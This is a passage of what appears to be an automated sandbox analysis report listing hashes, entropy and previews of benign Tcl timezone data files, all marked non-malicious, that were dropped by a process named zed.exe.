                                                                                                                                                                                                                                            SHA-256:D558C25F165E956E980AA8F554AB3BF24E91B51EADBD2B1065EF6DFDA0E2F984
                                                                                                                                                                                                                                            SHA-512:318804ED41F36A3A8746C8CD286116787A768B06CAD6057559D1C7105170DE6EAB807EFA52AA8A0E353491B6F8C47D623D4473C1AEAD20B5C00747E07BB282B2
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Caracas) {.. {-9223372036854775808 -16064 0 LMT}.. {-2524505536 -16060 0 CMT}.. {-1826739140 -16200 0 -0430}.. {-157750200 -14400 0 -04}.. {1197183600 -16200 0 -0430}.. {1462086000 -14400 0 -04}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):227
                                                                                                                                                                                                                                            Entropy (8bit):4.666638841481612
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9vsM3y7/MMXAXHAIgp/MMXmRN/29094SXAFB5290/MMXAy:MByMY/MYp/MrRt290mh5290/MK
                                                                                                                                                                                                                                            MD5:EEB851BE330BCC44A4831763534058B9
                                                                                                                                                                                                                                            SHA1:A5FC3E69DDBD3C40D9EB4317BBD5BB6C78751B36
                                                                                                                                                                                                                                            SHA-256:37CD6BDAA6C6EEDFAC3288CA1C11F5CBBE8A17E5F2E790E7635A64B867AFBD87
                                                                                                                                                                                                                                            SHA-512:7CD0BC822550325EB3198B4AD6CCD38938FA654A03A09C53117560D1FE3FDCD9C892D105F0D7AF44ED52DD7E0475721240D74A10C98619BE9EC4F5410B8FD87D
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Argentina/Catamarca)]} {.. LoadTimeZoneFile America/Argentina/Catamarca..}..set TZData(:America/Catamarca) $TZData(:America/Argentina/Catamarca)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):185
                                                                                                                                                                                                                                            Entropy (8bit):4.832612867310476
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QF08x/2IAcGE91INMXGm2OHEFvpoeoHsdR4FIUPvGXFkUwXvp3VVV:SlSWB9eg/2909qDm2OHEdGeoHm4vOXF6
                                                                                                                                                                                                                                            MD5:6052E52C8E5A5F43102C47D895797A1F
                                                                                                                                                                                                                                            SHA1:23DBD40AE96C84E44ADCD1AC33E7871D217C17BC
                                                                                                                                                                                                                                            SHA-256:873285F3E13CB68DD28EB109ECAD8D260E11A9FF6DF6A4E8E0D4C00B0182695B
                                                                                                                                                                                                                                            SHA-512:DDE89C70B6F24AD4F585DC5424A6D029E5C898254C9085C588AE699CED4C8316840FF7C87685D7CFAA2E689F01687985454A0C9E3886342E936C56AB688DF732
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Cayenne) {.. {-9223372036854775808 -12560 0 LMT}.. {-1846269040 -14400 0 -04}.. {-71092800 -10800 0 -03}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):185
                                                                                                                                                                                                                                            Entropy (8bit):4.774923706273939
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx0u55DyXHAIg20u5cvRL/2IAcGE91mr4IAcGEu5pvn:SlSWB9vsM3y7oDSHAIgpdN/2909Yr49F
                                                                                                                                                                                                                                            MD5:AD6E086BEDF05A0BEB66990BD9518BEE
                                                                                                                                                                                                                                            SHA1:FA0B7E8D6931E79092A90F7EECBA2293AE886AE3
                                                                                                                                                                                                                                            SHA-256:C38C49AE1C3E67BD2118002DCFCC3C0EFB6892FB9B0106908A9282C414D0BF2E
                                                                                                                                                                                                                                            SHA-512:A1E40422D15DBCB24A6FE353639A1541FAD7F394D20F8AEB32D4E39667BA264C3E815BAA703B88B90D381540168016A0641CA220BACAF05E80EAA698642B6FFA
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Panama)]} {.. LoadTimeZoneFile America/Panama..}..set TZData(:America/Cayman) $TZData(:America/Panama)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):11372
                                                                                                                                                                                                                                            Entropy (8bit):3.814348526052702
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:l6u30Ke1rdJ8SUklvgahLi8hbZlNA604qSScBgN+4ctDzIVQ/c/3hNxTh:l1EKwdJ8SUkl4aUqtfA604qSBgI7DBch
                                                                                                                                                                                                                                            MD5:763E23AA7FB20F8D7CB2F0E87FAFD153
                                                                                                                                                                                                                                            SHA1:B131A10C1C208BB5E5E178ACD21A679FD0537AC5
                                                                                                                                                                                                                                            SHA-256:C7707AF88D650F90839E7258356E39D85228B33B6DBCC5C065C3D8733AE28CEE
                                                                                                                                                                                                                                            SHA-512:FE9C5D2EA253338DDFD79CC8ED2F94D6817BD770C0895752EFB1917E2313735C18475D67191C29BCCD53DEFFF35C1BF0CA5D98C92091DDCD1E97CD6302DC73A4
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Chicago) {.. {-9223372036854775808 -21036 0 LMT}.. {-2717647200 -21600 0 CST}.. {-1633276800 -18000 1 CDT}.. {-1615136400 -21600 0 CST}.. {-1601827200 -18000 1 CDT}.. {-1583686800 -21600 0 CST}.. {-1577901600 -21600 0 CST}.. {-1563724800 -18000 1 CDT}.. {-1551632400 -21600 0 CST}.. {-1538928000 -18000 1 CDT}.. {-1520182800 -21600 0 CST}.. {-1504454400 -18000 1 CDT}.. {-1491757200 -21600 0 CST}.. {-1473004800 -18000 1 CDT}.. {-1459702800 -21600 0 CST}.. {-1441555200 -18000 1 CDT}.. {-1428253200 -21600 0 CST}.. {-1410105600 -18000 1 CDT}.. {-1396803600 -21600 0 CST}.. {-1378656000 -18000 1 CDT}.. {-1365354000 -21600 0 CST}.. {-1347206400 -18000 1 CDT}.. {-1333904400 -21600 0 CST}.. {-1315152000 -18000 1 CDT}.. {-1301850000 -21600 0 CST}.. {-1283702400 -18000 1 CDT}.. {-1270400400 -21600 0 CST}.. {-1252252800 -18000 1 CDT}.. {-1238950800
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2040
                                                                                                                                                                                                                                            Entropy (8bit):4.006586050664275
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:5wE2e49WU0S+VS+TjV/NF01YmM/parZ375+XiBn:5wEvU033FS1YrpaV5+yBn
                                                                                                                                                                                                                                            MD5:67738E07092EDB5A9F484ED5CA217EFB
                                                                                                                                                                                                                                            SHA1:9E428C67AE4BDACA48D189DF60374F3B6523E120
                                                                                                                                                                                                                                            SHA-256:93438D65EA8F95691748FF749219FAFA1940469BC61CED0B7CBF995B417F20B4
                                                                                                                                                                                                                                            SHA-512:57C9FE7EAE37504465F33B2AB079ED91700528E330D227E94AE8A06C58DEFA65F1EA1CDF89F835910D92D037DADB45E684A2EA96512B08F83650DD33CCEB8EB6
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Chihuahua) {.. {-9223372036854775808 -25460 0 LMT}.. {-1514739600 -25200 0 MST}.. {-1343066400 -21600 0 CST}.. {-1234807200 -25200 0 MST}.. {-1220292000 -21600 1 MDT}.. {-1207159200 -25200 0 MST}.. {-1191344400 -21600 0 CST}.. {820476000 -21600 0 CST}.. {828864000 -18000 1 CDT}.. {846399600 -21600 0 CST}.. {860313600 -18000 1 CDT}.. {877849200 -21600 0 CST}.. {883634400 -21600 0 CST}.. {891766800 -21600 0 MDT}.. {909302400 -25200 0 MST}.. {923216400 -21600 1 MDT}.. {941356800 -25200 0 MST}.. {954666000 -21600 1 MDT}.. {972806400 -25200 0 MST}.. {989139600 -21600 1 MDT}.. {1001836800 -25200 0 MST}.. {1018170000 -21600 1 MDT}.. {1035705600 -25200 0 MST}.. {1049619600 -21600 1 MDT}.. {1067155200 -25200 0 MST}.. {1081069200 -21600 1 MDT}.. {1099209600 -25200 0 MST}.. {1112518800 -21600 1 MDT}.. {1130659200 -25200 0 MST}.. {1143968400 -
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):192
                                                                                                                                                                                                                                            Entropy (8bit):4.844590153688034
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx0u55DyXHAIg20u5cvRL/2IAcGE9WtEaQXs+IAcGEi:SlSWB9vsM3y7oDSHAIgpdN/2909qEacn
                                                                                                                                                                                                                                            MD5:A0BF04CD77026DC1D2749848AB0EE45E
                                                                                                                                                                                                                                            SHA1:EA0F1BC11379DF2E421675BC5DE4805CE94B96D6
                                                                                                                                                                                                                                            SHA-256:C8CBF5A29CC1D0827390CA6E98B2EFCF90743C6DD0ECA143B300050DD4164041
                                                                                                                                                                                                                                            SHA-512:61968B4E42ECC60C801F959D18D13187AD39D9B81FA1A947F6B6862F99D73E3A30849AC4233DB5705D46F5373C42D8748B15BE9B82822971B4F47E601E5766D8
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Panama)]} {.. LoadTimeZoneFile America/Panama..}..set TZData(:America/Coral_Harbour) $TZData(:America/Panama)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):219
                                                                                                                                                                                                                                            Entropy (8bit):4.78887878252354
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9vsM3y7/MSHAIgp/M1ovN/29093+90/M7:MByMY/M7p/M16t290c90/M7
                                                                                                                                                                                                                                            MD5:C7CCF5CEC7AA60D6063D1C30F4263ADC
                                                                                                                                                                                                                                            SHA1:FD8E9AEEEE50656FD3C694CA051895DDC8E5590B
                                                                                                                                                                                                                                            SHA-256:28B84710EADEF7AD5E7FA63EF519A9D93996D3BB91DD9018333DE3AC4D8FB8DD
                                                                                                                                                                                                                                            SHA-512:6974F8B238977EE5222368C4B79327BB240580819FCA082261D6994781144D81E2E8843B4F1C9D07EFBEE27311C8930BDAC9C0D6D6718F6FB1600D0000576CDE
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Argentina/Cordoba)]} {.. LoadTimeZoneFile America/Argentina/Cordoba..}..set TZData(:America/Cordoba) $TZData(:America/Argentina/Cordoba)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):431
                                                                                                                                                                                                                                            Entropy (8bit):4.506976345480408
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12:MB86290lnmdHd5CvZN/Mi3yvI8/uF+wSJz/uF+IA/uF+i/X8/uF+ZDVxNv:5mnedIvZN/e5S+w+S+LS+i0S+pB
                                                                                                                                                                                                                                            MD5:0446EF1A6985A62EDFFB9FFAC7F1DE0E
                                                                                                                                                                                                                                            SHA1:A43468E120E585E2DCC20205BA1D1E2CCB6C0BC2
                                                                                                                                                                                                                                            SHA-256:E3061DC6FA9F869F013351A9FDF420448592D7F959C2B4404093432508146F7E
                                                                                                                                                                                                                                            SHA-512:86D41B0C49489572C3EAEDD5466AA92319C721CCEC9437EBB0F2AAD772FB5ED91A2F2061E00448FB48096B0BAAE9A4E1E644F8AF595B76BE05DBC0C801E6D6ED
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Costa_Rica) {.. {-9223372036854775808 -20173 0 LMT}.. {-2524501427 -20173 0 SJMT}.. {-1545071027 -21600 0 CST}.. {288770400 -18000 1 CDT}.. {297234000 -21600 0 CST}.. {320220000 -18000 1 CDT}.. {328683600 -21600 0 CST}.. {664264800 -18000 1 CDT}.. {678344400 -21600 0 CST}.. {695714400 -18000 1 CDT}.. {700635600 -21600 0 CST}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):189
                                                                                                                                                                                                                                            Entropy (8bit):4.8664633847782905
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx0utLaDovXHAIg20utLRYovHRL/2IAcGE9mM7x/h4y:SlSWB9vsM3y7OBHAIgpONYyHN/2909vr
                                                                                                                                                                                                                                            MD5:0757DD22C0E297CCE8E6678ECA4B39C7
                                                                                                                                                                                                                                            SHA1:81B31299F9A35C8BA2EC1F59EC21129FFCDCD52F
                                                                                                                                                                                                                                            SHA-256:A01DDB460420C8765CE8EF7A7D031ABD7BDB17CFA548E7C3B8574C388AA21E17
                                                                                                                                                                                                                                            SHA-512:F1AFC0F6371A10E4CB74FB2C8985610AEE6C3511861BC09384EDC99D250E9099A1F4430BFC3B0B396C2702BF9991A5A4ECFD53A82C92883460715FA2C1E04579
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Phoenix)]} {.. LoadTimeZoneFile America/Phoenix..}..set TZData(:America/Creston) $TZData(:America/Phoenix)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2912
                                                                                                                                                                                                                                            Entropy (8bit):3.588248620238414
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:5tSeSFESoSQSrSsCSeSPS1cSQSQlSsSyZS2SqLSwZS4vSoSUSLpSzS4X3/SxS1S4:rVsE3LMuJALTvn1ZdP7ZbvLfeAh+KIil
                                                                                                                                                                                                                                            MD5:264E0CEA9491B404993594E64F13479F
                                                                                                                                                                                                                                            SHA1:6D4D277FA470A2C7AD0A59B5DA3CC15BEEB74E78
                                                                                                                                                                                                                                            SHA-256:2D8281CF3FD9E859C5206F781E264854FA876CB36562A08C6C01343C65F8A508
                                                                                                                                                                                                                                            SHA-512:759C19B4DD0E1F7F1176872806BFB1F17ADF9C992E41B96FEA67D77DD67E9DD3C1683E3B6D27FB092C731F534C6A7441BACFFF0301907217A064523B86992E23
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Cuiaba) {.. {-9223372036854775808 -13460 0 LMT}.. {-1767212140 -14400 0 -04}.. {-1206954000 -10800 1 -04}.. {-1191358800 -14400 0 -04}.. {-1175371200 -10800 1 -04}.. {-1159822800 -14400 0 -04}.. {-633816000 -10800 1 -04}.. {-622065600 -14400 0 -04}.. {-602280000 -10800 1 -04}.. {-591829200 -14400 0 -04}.. {-570744000 -10800 1 -04}.. {-560206800 -14400 0 -04}.. {-539121600 -10800 1 -04}.. {-531349200 -14400 0 -04}.. {-191361600 -10800 1 -04}.. {-184194000 -14400 0 -04}.. {-155160000 -10800 1 -04}.. {-150066000 -14400 0 -04}.. {-128894400 -10800 1 -04}.. {-121122000 -14400 0 -04}.. {-99950400 -10800 1 -04}.. {-89586000 -14400 0 -04}.. {-68414400 -10800 1 -04}.. {-57963600 -14400 0 -04}.. {499752000 -10800 1 -04}.. {511239600 -14400 0 -04}.. {530596800 -10800 1 -04}.. {540270000 -14400 0 -04}.. {562132800 -10800 1 -04}.. {571201200 -1
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):201
                                                                                                                                                                                                                                            Entropy (8bit):4.876961543280111
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9vsM3y7p5oeSHAIgppON/2909C4e90ppv:MByMYbpwt290690b
                                                                                                                                                                                                                                            MD5:9459043060E33E8EDC74E78332E96EDF
                                                                                                                                                                                                                                            SHA1:27963FE063965584D0F226BAE9A08EB2954398F0
                                                                                                                                                                                                                                            SHA-256:ACCF08CF53C9431E226714DF8BEDE3C91BAF62D5BD7B98CA8B50D7258124D129
                                                                                                                                                                                                                                            SHA-512:215D9AFAA7227F4447177CE2ABA5A6F7F2F46A9D787845DD32F10D5C22BF9CBE4047AF5E0E66FA7A4F70EEE064A7EC7B67949E565C3C5C60C31F3C19D6915D76
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Puerto_Rico)]} {.. LoadTimeZoneFile America/Puerto_Rico..}..set TZData(:America/Curacao) $TZData(:America/Puerto_Rico)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1128
                                                                                                                                                                                                                                            Entropy (8bit):3.8794180227436557
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:5geNrmFQqFi77FkiVFw1ZFt9SFUXDFH9vMF0mFdS/FyMF8AWXF7HFEJF7cSXHVFS:5/vx7O11pbzvZ+S0xAqe12vey
                                                                                                                                                                                                                                            MD5:6E37A78AC686A6B48A78541E1900E33C
                                                                                                                                                                                                                                            SHA1:D41F39FDB6D45921B57341E95A006251B4875961
                                                                                                                                                                                                                                            SHA-256:968C56F1D0106E1D92C7B094EEF528B6EE1FFA3D7A18BE2F2BA59178C2C0F1E0
                                                                                                                                                                                                                                            SHA-512:397623149D95FF9A094750EE697F62DF90124BBBE407FB49FBAE335A61629449F2A61EF4471DBD57745B323DFCF3628611CAE9295F2EF7E4A7412A697651FF68
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Danmarkshavn) {.. {-9223372036854775808 -4480 0 LMT}.. {-1686091520 -10800 0 -03}.. {323845200 -7200 0 -02}.. {338950800 -10800 0 -03}.. {354675600 -7200 1 -02}.. {370400400 -10800 0 -03}.. {386125200 -7200 1 -02}.. {401850000 -10800 0 -03}.. {417574800 -7200 1 -02}.. {433299600 -10800 0 -03}.. {449024400 -7200 1 -02}.. {465354000 -10800 0 -03}.. {481078800 -7200 1 -02}.. {496803600 -10800 0 -03}.. {512528400 -7200 1 -02}.. {528253200 -10800 0 -03}.. {543978000 -7200 1 -02}.. {559702800 -10800 0 -03}.. {575427600 -7200 1 -02}.. {591152400 -10800 0 -03}.. {606877200 -7200 1 -02}.. {622602000 -10800 0 -03}.. {638326800 -7200 1 -02}.. {654656400 -10800 0 -03}.. {670381200 -7200 1 -02}.. {686106000 -10800 0 -03}.. {701830800 -7200 1 -02}.. {717555600 -10800 0 -03}.. {733280400 -7200 1 -02}.. {749005200 -10800 0 -03}.. {764730000 -72
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2967
                                                                                                                                                                                                                                            Entropy (8bit):3.9564096415565855
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:5IeVvxBn4nRfngnSSXRwEg7MkwY7Twbg7Uwr70vwHg7b6wa7gAHwc7/wzZg7ywJP:5zxKKpj/AOZFCARCeQbvb5wxMN6Ix
                                                                                                                                                                                                                                            MD5:F494405F3B250668BE00DC3864B9A2DC
                                                                                                                                                                                                                                            SHA1:20843AD6D95DD5D5950E2946BCAE4ECE2B676F70
                                                                                                                                                                                                                                            SHA-256:30E875343C81C8DE473E6313A27C55315F38E7CCDBD2CEE5783EC54D269D5807
                                                                                                                                                                                                                                            SHA-512:9102BD114436D5FE5A1942E31AE692ECE41F910AC1B6E52C02283801D5AA00CFF22D980C61E69928267D3DD34331E301C7324CA631B71AC2FBBDE06D7914F849
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Dawson) {.. {-9223372036854775808 -33460 0 LMT}.. {-2188996940 -32400 0 YST}.. {-1632056400 -28800 1 YDT}.. {-1615125600 -32400 0 YST}.. {-1596978000 -28800 1 YDT}.. {-1583164800 -32400 0 YST}.. {-880203600 -28800 1 YWT}.. {-769395600 -28800 1 YPT}.. {-765381600 -32400 0 YST}.. {-147884400 -25200 1 YDDT}.. {-131554800 -32400 0 YST}.. {315561600 -28800 0 PST}.. {325677600 -25200 1 PDT}.. {341398800 -28800 0 PST}.. {357127200 -25200 1 PDT}.. {372848400 -28800 0 PST}.. {388576800 -25200 1 PDT}.. {404902800 -28800 0 PST}.. {420026400 -25200 1 PDT}.. {436352400 -28800 0 PST}.. {452080800 -25200 1 PDT}.. {467802000 -28800 0 PST}.. {483530400 -25200 1 PDT}.. {499251600 -28800 0 PST}.. {514980000 -25200 1 PDT}.. {530701200 -28800 0 PST}.. {544615200 -25200 1 PDT}.. {562150800 -28800 0 PST}.. {576064800 -25200 1 PDT}.. {594205200 -28800 0 P
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1940
                                                                                                                                                                                                                                            Entropy (8bit):4.024810417421672
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:5/eUv5wk7Zw9JmnRsw78wP+7bw+7zwN7SynwpBZ7Fwk47H+wW73wo5775w572Iwl:5DuY/YRRvkGZ+R64CjSUlTGS
                                                                                                                                                                                                                                            MD5:7868720D39782147B2BD6B039A5BF7E0
                                                                                                                                                                                                                                            SHA1:6F66404E5CCFF7F020269A316D792D5E7AD4C280
                                                                                                                                                                                                                                            SHA-256:540804BECDEAB92340EF02D32A62BFD550B71A3DB8D829BE426EE4D210004643
                                                                                                                                                                                                                                            SHA-512:9CCD124FF954CA2988F07286FFE9ED740E0CEF5F4D76BF090367B74A577E91BF5590EDFE12AFC83ACF5CBFC88C5A68867C58082A2777D08C326A7B18889B08E2
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Dawson_Creek) {.. {-9223372036854775808 -28856 0 LMT}.. {-2713881544 -28800 0 PST}.. {-1632060000 -25200 1 PDT}.. {-1615129200 -28800 0 PST}.. {-880207200 -25200 1 PWT}.. {-769395600 -25200 1 PPT}.. {-765385200 -28800 0 PST}.. {-725817600 -28800 0 PST}.. {-715788000 -25200 1 PDT}.. {-702486000 -28800 0 PST}.. {-684338400 -25200 1 PDT}.. {-671036400 -28800 0 PST}.. {-652888800 -25200 1 PDT}.. {-639586800 -28800 0 PST}.. {-620834400 -25200 1 PDT}.. {-608137200 -28800 0 PST}.. {-589384800 -25200 1 PDT}.. {-576082800 -28800 0 PST}.. {-557935200 -25200 1 PDT}.. {-544633200 -28800 0 PST}.. {-526485600 -25200 1 PDT}.. {-513183600 -28800 0 PST}.. {-495036000 -25200 1 PDT}.. {-481734000 -28800 0 PST}.. {-463586400 -25200 1 PDT}.. {-450284400 -28800 0 PST}.. {-431532000 -25200 1 PDT}.. {-418230000 -28800 0 PST}.. {-400082400 -25200 1 PDT}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):8920
                                                                                                                                                                                                                                            Entropy (8bit):3.8540632258197514
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:gjGtwmGaLV911sF7Lv/PCewtA8CzSPyDLbrcUia:gUwDPlLv/PCenJzS6cy
                                                                                                                                                                                                                                            MD5:0D649599A899ECB3FCF2783DCEE3E37B
                                                                                                                                                                                                                                            SHA1:ACC796BE75F41A12FB1F8CCBD2B2839AF9876FFE
                                                                                                                                                                                                                                            SHA-256:3FE2EE8C05C5D6F268B58BD9FC3E3A845DEA257473B29F7B3FB403E917448F3C
                                                                                                                                                                                                                                            SHA-512:C10D41AB95439B8E978F12F9F58D1ACC9AD15404123FA5FBA0D1CC716E5CF5DA6BD2252450055AC3998DBCB8DD49F7A82ACD53413E3EE78CDA2C42F603DE2C56
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Denver) {.. {-9223372036854775808 -25196 0 LMT}.. {-2717643600 -25200 0 MST}.. {-1633273200 -21600 1 MDT}.. {-1615132800 -25200 0 MST}.. {-1601823600 -21600 1 MDT}.. {-1583683200 -25200 0 MST}.. {-1577898000 -25200 0 MST}.. {-1570374000 -21600 1 MDT}.. {-1551628800 -25200 0 MST}.. {-1538924400 -21600 1 MDT}.. {-1534089600 -25200 0 MST}.. {-883587600 -25200 0 MST}.. {-880210800 -21600 1 MWT}.. {-769395600 -21600 1 MPT}.. {-765388800 -25200 0 MST}.. {-757357200 -25200 0 MST}.. {-147884400 -21600 1 MDT}.. {-131558400 -25200 0 MST}.. {-116434800 -21600 1 MDT}.. {-100108800 -25200 0 MST}.. {-94669200 -25200 0 MST}.. {-84380400 -21600 1 MDT}.. {-68659200 -25200 0 MST}.. {-52930800 -21600 1 MDT}.. {-37209600 -25200 0 MST}.. {-21481200 -21600 1 MDT}.. {-5760000 -25200 0 MST}.. {9968400 -21600 1 MDT}.. {25689600 -25200 0 MST}.. {41418000 -2
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):8430
                                                                                                                                                                                                                                            Entropy (8bit):3.826664943157435
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:SGiS1A5tCt/cL1BRP0HY2iU7KKdFL6Aa2K4gSLf8e:SG/K5ItON0HY2iUmUFLqU
                                                                                                                                                                                                                                            MD5:2BBA922E9377D257CBDF6E1367BBB1A2
                                                                                                                                                                                                                                            SHA1:6F33A44834E8041E78660A326A5DDAF3D7F9DC2A
                                                                                                                                                                                                                                            SHA-256:84F6897B87D3978D30D35097B78C55434CE55EB65D6E488A391DFC3B3BB5A8FE
                                                                                                                                                                                                                                            SHA-512:D225824945C08A3521A8288B92B26DFFA712ED3505E72DEDE4A7D1777E58DEA79ADF3F042D22624E4142DD4203BAA4DFF8EB08B7033FDF00059F6C39954EA1A1
                                                                                                                                                                                                                                            Malicious:false
